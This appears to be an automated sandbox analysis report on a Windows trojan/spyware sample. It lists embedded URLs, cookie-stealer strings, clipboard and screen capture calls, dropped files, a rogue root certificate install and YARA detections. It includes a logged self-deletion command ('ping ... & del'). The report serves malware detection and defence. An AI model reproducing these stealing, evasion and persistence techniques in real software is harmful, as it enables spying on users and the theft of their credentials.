Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp, ecv71A3.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.com
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.com/sec-fetch-dest:
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.comreferer:
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.com
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.com/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/wd=488x1043;
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.com/origin:
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.comaccept-language:
Source: aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp	String found in binary or memory: https://www.namecheap.com/assets/img/nc
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.namecheap.com/assets/img/nc-icon/favicon.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040AE4D OpenClipboard,

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: 0_2_0042D3A8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

Source: ThunderFW.exe, 00000002.00000002.231958578.0000000000B5A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: 0_2_0043B0F0 GetKeyState,GetKeyState,GetKeyState,

System Summary:

PE file has a writeable .text section

Show sources

Source: aOn5CfTiwS.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_0040C516 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_004A0004
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_004443D4
Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_00956A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_00959B7F

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: String function: 004AA524 appears 37 times

Source: aOn5CfTiwS.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 1612058829275.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612058829275.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: aOn5CfTiwS.exe	Binary or memory string: OriginalFilename vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameFsFilter.sys vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename" vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp	Binary or memory string: @shell32.dllSHGetSpecialFolderPathWSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Foldersshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X<>"°&<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileName vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameEdgeCookiesView.exe@ vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe	Binary or memory string: OriginalFilename" vs aOn5CfTiwS.exe

Source: aOn5CfTiwS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 00000000.00000002.265213011.0000000010249000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.2880000.2.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.2880000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.10000000.3.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: classification engine

Classification label: mal80.troj.spyw.evad.winEXE@10/16@7/2

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: CreateServiceA,GetLastError,

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: 2_2_00951058 CoCreateInstance,

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_01
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_install_r3

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

File created: C:\Users\user\AppData\Local\Temp\xldl.dat

Jump to behavior

Source: aOn5CfTiwS.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

System information queried: HandleInformation

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: aOn5CfTiwS.exe	Virustotal: Detection: 43%
Source: aOn5CfTiwS.exe	Metadefender: Detection: 24%
Source: aOn5CfTiwS.exe	ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

File read: C:\Users\user\Desktop\aOn5CfTiwS.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\aOn5CfTiwS.exe 'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\1612058829275.exe 'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Process created: C:\Users\user\AppData\Roaming\1612058829275.exe 'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt'
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E2B3C97F-6AE1-41AC-817A-F6F92166D7DD}\InprocServer32

Source: aOn5CfTiwS.exe

Static file information: File size 5007872 > 1048576

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.0.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe, 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp, 1612058829275.exe.0.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.0.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.0.dr
Source:	Binary string: atl71.pdb source: atl71.dll.0.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.0.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.0.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.0.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.0.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.0.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.0.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000002.00000000.231496774.000000000095C000.00000002.00020000.sdmp, ThunderFW.exe.0.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.0.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.0.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Unpacked PE file: 0.2.aOn5CfTiwS.exe.2880000.2.unpack

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040D071 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: aOn5CfTiwS.exe

Static PE information: real checksum: 0xeea28 should be: 0x4c8d48

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0040D0E4 push 0040D110h; ret
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_004421C4 push 0044221Eh; ret
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0044526C push 00445298h; ret
Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_0040E2F1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_00953FB5 push ecx; ret

Persistence and Installation Behavior:

Installs new ROOT certificates

Show sources

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob

Jump to behavior

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Roaming\1612058829275.exe	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0043A078 IsIconic,BeginPaint,DrawIcon,EndPaint,
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_00441118 SendMessageA,SetClassLongA,IsIconic,InvalidateRect,
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0043A1C4 IsIconic,
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0043B1BC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0043F2BC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

